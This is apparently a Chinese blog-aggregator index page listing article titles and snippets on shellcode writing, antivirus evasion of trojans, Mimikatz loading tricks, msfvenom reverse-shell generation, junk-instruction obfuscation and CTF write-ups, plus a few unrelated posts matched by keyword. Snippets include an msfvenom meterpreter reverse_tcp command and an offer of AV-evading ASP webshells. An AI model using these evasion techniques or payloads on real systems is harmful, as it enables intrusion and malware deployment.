免杀Shellcode

objdump的使用方法

对于一般只想让自己程序跑起来的程序员,这个命令没有更多意义,对于想进一步了解系统的程序员,应该掌握这种工具,至少你可以自己写写shellcode了,或者看看人家给的exploit中的shellcode是什么东西
t_larry·2020-09-17 05:20

Winamp v5.572 whatsnew.txt WinXP SP3 本地溢出漏洞

$shellcode;print"[+
Purplecode·2020-09-17 04:45

Exploit,shellcode经验技巧谈

这篇文章不是教你如何去写exploit,shellcode,而是希望提供一些关于编写或者研究exploit,shellcode的经验和技巧。适合理解了shellcode编写原理的朋友。
linkqishi·2020-09-16 08:34

REAL Win32 GENERIC SHELLCODE

/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/==========
linkqishi·2020-09-16 08:03

编写shellcodes 的方法

UNF&&pr1present:WritingLinux/x86shellcodesfordumdums.
linkqishi·2020-09-16 08:03

Metasploit——msfvenom免杀木马

msfvenom命令的参数Options:-l,--list#列出所有可用的项目,其中值可以被设置为payloads,encoders,nops,platforms,archs,encrypt,formats等等-p,--payload#指定特定的Payload,如果被设置为-,那么从标准输入流中读取--list-options#列出--payload的标准,高级和规避选项-f,--format#
小白白@·2020-09-15 09:36

溢出保护机制

导入shellcode需要:没有NX保护,需要
暗礁小斗笔·2020-09-15 08:01

黑客工具

[木马]·全套asp全免杀马(海洋,老兵,小马.....)共四个asp木马,经过检测全都免杀!
hehe0108·2020-09-15 07:44

linux内核漏洞利用初探(2):demo-null_dereference

1.NULLDereference(1)介绍古老的LinuxNULLpointerdereferenceexploit,映射0地址分配shellcode运行(2)漏洞代码#include#include
bsauce·2020-09-15 05:24

Mimikatz的18种免杀姿势及防御策略

PS:建议:win10慎用,唉,伤心然后按照里面的的步骤一步步去执行,有很多错误,所以如果您只是看技巧的话,可以去原文查看哦。或者读的时候略过我的错误部分啦。>_$wc=new-objectnet.webclientC:\Users\Xor0ne\Desktop>$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCr
小样!!!·2020-09-14 21:06

MSF里侦听模块的使用教程 exploit/multi/handler

如果想过墙只能自己加免杀的代码喽,反正我是还没学到呢。或者去百度shellter下载剥壳机自己加免杀的,有两个版本免费版和专业版,本人亲测免费版过不了windo
F&G·2020-09-14 20:59

【CTF题解NO.00002】minilCTF 2020 - write up by arttnba3

NO.00002】minilCTF2020-writeupbyarttnba30x00.绪论0x01.SigninStartingPoint0x02.PWNhelloret2text执行过程:ret2shellcode
arttnba3·2020-09-14 18:08

免杀篇】远控免杀专题(69)-Mimikatz的18种免杀姿势及防御策略(下)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录方法11-用C#加载mimikatz(VT查杀率35/73)方法12-JS加载mimikatz(VT查杀率22/59)方法13-msiexec加载mimikatz(VT查杀率25/60)方法14-白名单msbuild.exe加载(VT查杀率4/59)方法15-JScript的xsl版(VT查杀率7/60)方法16-jscript的sct版(VT
Agan '·2020-09-14 17:27

如何通过shell脚本统计apache使用多少内存

很多筒子问我如何能够写出能用的shell脚本这事其实不难,只要按照以下思路进行就行了1把复杂的问题简单化,模块化2写出每个模块的伪码3组装你的模块4写出shellcode5测试这事看起来很简单,做起来。
weixin_33852020·2020-09-14 16:15

栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(三)linux下进程中的多用户

在linux进程中会存在两个用户状态,一种是实际用户ID,一种是有效用户ID实际用户IDuid,就是我是谁,也就是你在操作时候的用户ID,通常你可以用命令id来查看自己的信息>iduid=1005(raintung)gid=100(users)groups=16(dialout),33(video),100(users)而通常root的uid是0有效用户IDeuid,这是控制进程能访问的资源的id
raintungli·2020-09-14 15:00

VirtualApp技术黑产利用研究报告

VA免安装运行APK的特性使得VA内应用与VA相比具有不同的应用特征,这使得VA可用于免杀。此外,VA对被多开应用
lee咸鱼·2020-09-14 14:34

必须转载:Metasploit Pro 完全免杀

Becomeinvisibletoanti-virusprotectionWouldn’titbefantastictobeinvisibleforaday?Walkstraightintoabankvaultinthemorning,beaflyonthewallintheOvalOfficeforlunch,andspendaneveninginyourfavoritemoviestar’sh
weixin_33853794·2020-09-14 08:47

[原创]K8uac bypassUAC(Win7/Wi8/Win10) 过46款杀软影响所有Windows版本

不但支持全系统而且还免杀,你让我上哪说理去。免杀报告:http://r.virscan.org/language/en/report/2b1a191
weixin_30335353·2020-09-14 07:17

msf反弹木马之免杀

原理利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。准备win7靶机ip:192.168.56.130kali攻击机ip:192.168.56.135##实战开始1.打开kali机,在命令行输入:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.56.135lport=123
imbia·2020-09-14 07:08

veil-evasion 在xp下的三分之二免杀

1.apt-getinstallveil-evasion2.List--查找相应的木马生成模块3.选择354.Options--查看需要设置的选项5.Setuse_pyherionY6.Generate7.选择1.msfvenom(defualt)8.设置本机ip10.10.10.128,端口44449.重命名木马xx.rc10.选择1pyinstaller(default)11.找到生成的木马文
a439017985·2020-09-14 05:47

Crack8 + QQ吻的教程更新110个(20091016)

Crack8+QQ吻的教程更新110个(20091016)QQ吻QQ396890445有偿收徒软件脱壳木马病毒免杀VB编程诚信交易骗子勿扰^O^点此查看QQ吻最近更新教程^O^QQ吻==VB黑客编程班教程
K8_team·2020-09-13 14:02

分享一个远程控制软件源代码

没有怎么去优化,也不免杀,有很多Bug遗留。放出代码也仅仅是为了给远程控制爱好者作为入门级的参考。因为现在很久没有用C++做windows上面的开发了。电脑上也没安装visualstudio。
Witch_Soya·2020-09-13 05:52

windows内存注入

比如我们可以让Chrome.exe和shellcode.exe进行通信,进程中只有chrome.exe,杀软就
qscft1234·2020-09-13 03:06

恶意PPT文件夹带漏洞攻击和后门程序

一旦用户者打开恶意PPT文件,就会触发Flash内的Shellcode,并利用CVE-2011-0611漏洞展开攻击,将“Winword.tmp”文件保存到Temp文件夹。同时还会产生一个非恶
亚信安全·2020-09-13 01:59

栈溢出利用SEH异常处理

先来看下示例代码:#include#includecharshellcode[]={"\x90\x90\x90\x90\x90\x90\xeb\x10"\"\x90\x90\x90\x90\x90\x90
Yuri800·2020-09-12 19:56

jarvisoj——[XMAN]level2

题目Wp查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。
Bubble_zhu·2020-09-12 13:24

使用C#实现远程线程插入.

使用严格的C#,不借助任何其它技术.远程线程插入是不能在.NET平台上实现的.然而在shellcode技术和远程线程插入之代码插入的基础上.完全可以实现基于.NET平台的混合型远程线程插入.最终效果是这样的
lovelacy·2020-09-12 06:00

免杀技术

与防病毒厂商共享信息VirusTotalhttps://www.virustotal.com/zh-cnVirScanhttps://virscan.org黑产在线查杀引擎https://nodistribute.comhttp://viruscheckmate.com扫描网站安全性http://onlinelinkscan.com使用msf编码模块生成后门msfvenom-pwindows/sh
weixin_30755393·2020-09-12 01:58

男女那点破事儿——饺子情结

李世民,一代天可汗,万世帝皇表率,也不免杀兄霸嫂。多尔衮,统领八旗,入主中原,奠定万世基业。可谓权势滔天,却拜倒在嫂子孝庄的裙下。而文学作品中更是热衷于此类“叔嫂”情节。以四大名著为例。
公子明月光·2020-09-11 20:41

用VC写Assembly代码(5) --函数调用(三)

char*a=(char*)MessageBox;__asm{push0push0push0push0movebx,77d5050bhcallebx}printf("%0x/n",a);}顺便转一篇有关SHELLCODE
小发猫·2020-09-11 14:05

免杀原理详解(二)

一:灰鸽子免杀方法大全在所有的版本中,黑防的鸽子算是比较好做免杀的了,今天在这里,我就用他做案例1,最经典的OD一半一半定位法我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用
byte_way·2020-09-11 12:52

木马免杀之汇编花指令技巧

木马免杀之汇编花指令技巧相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程
zhu2695·2020-09-11 12:49

免杀花指令

今天送上经典花指令注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果.pushebppopebppusheaxpopeaxpushesppopesppush0push0push10----
weixin_34106122·2020-09-11 11:45

免杀之路

(一)、免杀应注意的事项:1.免杀的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/)在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了
weixin_34096182·2020-09-11 11:44

免杀技术经验总结

学习免杀,首先你得学会汇编把,基础的指令要懂得一些,一般的指令修改必须会,一般的修改这里就不赘述了,接下来就是掌握一些常用的免杀技巧,这里总结一些第一:我们学习免杀的方向:只是为了保护自己的黑软的话!
weixin_33834075·2020-09-11 10:29

免杀技术

基础内容杀毒软件是如何检测出恶意代码的?1.静态分析方法就是在不运行恶意代码的情况下,利用分析工具对恶意代码的静态特征和功能模块进行分析的方法。静态分析工具包括ollyDump(GigaPede2009)、W32DASM(URSoftware2009)、IDAPro(DataReseue2009)和HIEw(Suslikov2009)等。利用静态分析方法,可以分析出恶意代码的大致结构,可以确定恶意
weixin_30615767·2020-09-11 10:24

免杀小结(特征码)

于是找了本(黑客免杀攻防)挑出几章看了一下。发现原来教程里不讲原理,导致我不知道讲师在做什么。
Expl0it_·2020-09-11 10:14

shellcode检测——libemu原理分析

一、简介libemu是一款用C语言实现的基于x86的shellcode检测的库。
sealyao·2020-09-11 10:11

花指令原理

转自:http://hi.baidu.com/zhangjw918/blog/item/c69a7943e16de1189213c62f.html第一个免杀花指令生成器--不简单的免杀工具(图)陆续将以前发表在杂志的文章放上来
longxin5·2020-09-11 09:13

花指令免杀

最近开始研究免杀技术,首先强烈推荐《黑客免杀攻防》一书,作者写的很接地气,非常有实战性的一本教材。我看了之后,对其中的一些思想和用到的技术比较有共鸣,是这段时间难得坚持看的一本书。
iteye_2140·2020-09-11 08:53

免杀之花指令

pushebppopebppusheaxpopeaxpushesppopesppush0push0push10-------其中数字可以任意,注意与下面对应push-10nop-----------可任意在中间添加与它等效的:movEDI,EDIaddesp,1-------其中数字可以任意,注意以下面对应addesp,-1addesp,1--------其中数字可以任意,注意以下面对应subes
iiprogram·2020-09-11 08:14

学习免杀技术请从下面开始

还有一些查壳脱壳软件(如:PEIDRL脱壳机等).以下是常用的几种免杀方法及工具:一、要使一个木马免杀首先要准备一个不加壳的木马,这点非常重要,否则免杀操作就不能进行下去。
hack8·2020-09-11 08:11

漏洞分析挖掘基础知识

栈溢出栈溢出是缓冲区溢出的一种,往往由于对缓冲区的长度没有判断,导致缓冲区的大小超过了预定的大小,导致在栈内的保存的返回地址被覆盖,这时候返回地址将指向未知的位置.造成访问异常的错误.而当我们精心构造一段shellcode
syumlyyc·2020-09-11 03:13

栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(七)利用寄存器攻击

在(六)中我们提到了使用固定栈地址的攻击方式,但在实际中,系统默认的参数不会为0cat/proc/sys/kernel/randomize_va_space那么在系列中的六失去攻击的意义,但是任何事情都会有漏洞,我们来讲另一个基于寄存器的攻击漏洞代码vulnerableret2reg.c#include#includevoidevilfunction(char*input){charbuffer[
raintungli·2020-09-10 17:10

Windows免杀小结(工具篇)

windows免杀工具推荐:TheFatRat:https://github.com/Screetsec/TheFatRat安装过程介绍得很详细,这里稍微注意一下:如果执行完该步骤:.
book4yi·2020-09-03 19:20

去拉萨过雪顿节吧

相传四月到六月天气变暖,百虫惊蛰,万物复苏,僧人活动难免杀生,因此在此期间,僧人只在寺庙念经修行,直到六月底方可开禁。僧人们纷纷下山,老百姓用酸奶犒劳僧人。前一天定
会飞的猫仔·2020-09-03 16:51

Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode

Wheredoyouwanttojmptoday?Inoneofmypreviousposts(part1ofwritingstackbasedbufferoverflowexploits),Ihaveexplainedthebasiscaboutdiscoveringavulnerabilityandusingthatinformationtobuildaworkingexploit.Inthe
dandandeshui·2020-08-26 23:21

mrctf-wp- re

mrctf-wpreTransformPixelShooterlolhello_world_goJunkHard-to-goshit调试脚本赛后膜一波EasyCppVirtualTreepwneasyoverflowshellcodeEasy_equationcryptokeyboardEt
-令则·2020-08-26 08:56

rop [ 一] 栈溢出和简单ROP思路

ROPROP即返回导向的编程主要是用在栈溢出在栈堆不可执行开启后,栈溢出不能简单的向栈中写入shellcode利用jmprsp运行,因此开发出的一种栈溢出利用手段,主要的意思就是修改ret的位置,运行到一些程序内部的代码片段
-令则·2020-08-26 08:24

纯ascii的shellcode编写

上次ssctf决赛出现了一次纯ascii的shellcodePYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIXYJKMK9ICD6DJT019BOB47P1YYE4LK2Q6PLK2VDLLKD6ELLKQVDHLK3N10LKWFGH0OR8SEJS1IS1N1KOM13PLKRLFD7TLKW5WLLK0TGXRXS1ZJL
ling13579·2020-08-26 07:24
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他